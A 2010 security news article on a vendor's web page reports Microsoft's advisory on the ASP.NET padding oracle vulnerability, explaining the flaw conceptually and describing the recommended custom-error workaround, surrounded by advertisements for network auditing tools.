Recommended Product
Network Security Audit Software
Network Security Audit Software and Computer Security Tools
  Learn More
 
 
  Network Security Software
Network Bandwidth Monitor

Network Bandwidth Monitor
NBMonitor displays real-time details about your network connections & bandwidth usage.

   
Network Access Monitoring

Network Access Monitoring
ShareAlarmPro monitors network access to shared folders and resources.

   
Product Key Finder
Product Key Finder

Product Key Explorer retrieves over 800 software product keys from network computers.
   
Network Shares Monitoring

Network Share Watcher
Monitors network folders permissions and identify shares which are violating company data access policy.

 
 

Network Security News

Microsoft Releases Security Advisory For ASP.NET Vulnerability

September 19, 2010

Microsoft issued a security advisory Sept. 17 with a workaround for a vulnerability impacting Web applications built on ASP.NET.

The advisory was in response to findings by security researchers Juliano Rizzo and Thai Duong, who developed the “Padding Oracle Exploit Tool” to demonstrate the attack. At the heart of the issue is a vulnerability in the way ASP.NET implements encryption to protect data. The problem, Microsoft said, is caused by ASP.NET providing Web clients details in error messages when decrypting certain ciphertext.

“An oracle in the context of cryptography is a system which provides hints as you ask it questions,” Microsoft Security Response Center Engineering, in a post on Microsoft’s Security Research & Defense blog. “In this case, there is a vulnerability in ASP.Net which acts as a padding oracle. This allows an attacker to send chosen cipher text to the server and learn if it was decrypted properly by examining which error code was returned by the server."

"By making many requests the attacker can learn enough to successfully decrypt the rest of the cipher text," he continued. "The attacker can then alter the plain text and re-encrypt it as well.”

If the ASP.NET application stores sensitive information, such as passwords or database connection strings, in the ViewState object the data could be compromised, Brown blogged.

"The ViewState object is encrypted and sent to the client in a hidden form variable, so it is a possible target of this attack," he wrote. "If the ASP.Net application is using ASP.Net 3.5 SP1 or above, the attacker could use this encryption vulnerability to request the contents of an arbitrary file within the ASP.Net application."

"The public disclosure demonstrated using this technique to retrieve the contents of web.config," he added, noting that any "file in the ASP.Net application which the worker process has access to will be returned to the attacker."

Microsoft said it is planning an update to address the issue, and as of Sept. 17 was not aware of any attacks targeting the flaw. According to the advisory, using Triple DES encryption instead of AES encryption will have no effect, since the "cryptographic vulnerability being presented involves revealing cryptographic padding errors to a client for algorithms that use PKCS #7 padding" and Triple DES shares that padding mode with AES.

As a workaround, the company recommends enabling ASP.NET custom errors, and mapping all error codes to the same error page to make it more difficult for an attacker to distinguish the different types of errors. Advice on how to do that is contained within the advisory.

View more news

 
  Most Popular
. Computer Security

. Ethical Hacking

. Windows 7: the untold story of how the enterprise gets snubbed

. Open source identity: Linux founder Linus Torvalds

. FAQ: How to protect your PC against the Downadup worm

. Brocade's new CTO takes aim at Cisco

. Heartland tries to rally industry in wake of data breach

. IBM confirms layoffs

. Apple puts iPhone Nano and Netbook rumors to rest

. Microsoft 'can't imagine' PS3 catching up to Xbox 360
 
 
  Popular Searches
 
 
 

 

Sponsored Links
Network Security Auditor
Nsauditor is a complete networking utilities package that includes more than 45 network tools and utilities for network auditing, scanning,network connections monitoring and more. For more information, please visit:
www.nsauditor.com


Password Recovery Software
SpotAuditor is All-in-one password recovery program that offers administrators and users a comprehensive solution for recovering passwords and other critical business information saved in users' computers. For more information, please visit:
www.password-recovery-software.com

BlueAuditor - Monitor YourBluetooth Network
BlueAuditor detects and monitors Bluetooth devices in a wireless network and allows network administrators to audit wireless networks against security vulnerabilities associated with the use of Bluetooth devices. For more information, please visit:
nsauditor.com/bluetooth_network_scanner.html